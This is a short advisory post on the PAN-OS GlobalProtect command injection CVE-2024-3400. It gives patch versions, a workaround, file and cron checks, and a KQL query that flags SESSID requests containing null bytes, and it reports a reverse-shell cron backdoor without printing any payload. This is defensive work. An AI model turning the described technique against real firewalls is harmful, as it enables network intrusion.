CVE-2024-3400: Palo Alto PAN-OS command injection — analysis and detection
CVE-2024-3400 — Critical command injection in Palo Alto GlobalProtect gateway (CVSS 10.0).
What happened
Unauthenticated attackers could execute arbitrary commands on the firewall via a crafted request to the GlobalProtect portal. The vulnerability was in the session handling for GlobalProtect's SESSID cookie.
Why it matters
- Firewalls are trusted perimeter devices. Owning a firewall = owning the network.
- Palo Alto firewalls are in ~30% of enterprise networks.
- This was exploited in the wild before a patch was available.
Detection
Check for suspicious files in the GlobalProtect cache:
find /opt/panlogs/tmp/device_telemetry/hour/ -name "*.css" -exec ls -la {} \;
Look for unexpected cron entries:
crontab -l
cat /etc/cron.d/*
Mitigation
- Patch immediately (PAN-OS 10.2.9-h1, 11.0.4-h1, 11.1.2-h3)
- Apply Threat Prevention signature (Threat ID 95187)
- If unable to patch, disable GlobalProtect device telemetry as a temporary workaround
We found indicators on 2 of our client firewalls. The attacker dropped a Python reverse shell into the cron. Patch AND check for persistence. Patching alone doesn't remove the backdoor.
For Sentinel/KQL detection of exploitation attempts:
CommonSecurityLog
| where DeviceVendor == "Palo Alto Networks"
| where Activity contains "globalprotect"
| where RequestURL contains "SESSID" and RequestURL matches regex @"\x00"
| project TimeGenerated, SourceIP, RequestURL
This is why zero trust matters. Even if your firewall is compromised, if you're not relying on the firewall for all access control, the blast radius is limited. Lateral movement should be blocked by microsegmentation.
Verified Access Required
To maintain the integrity of our intelligence feeds, only verified partners and security professionals can post replies.
Request Access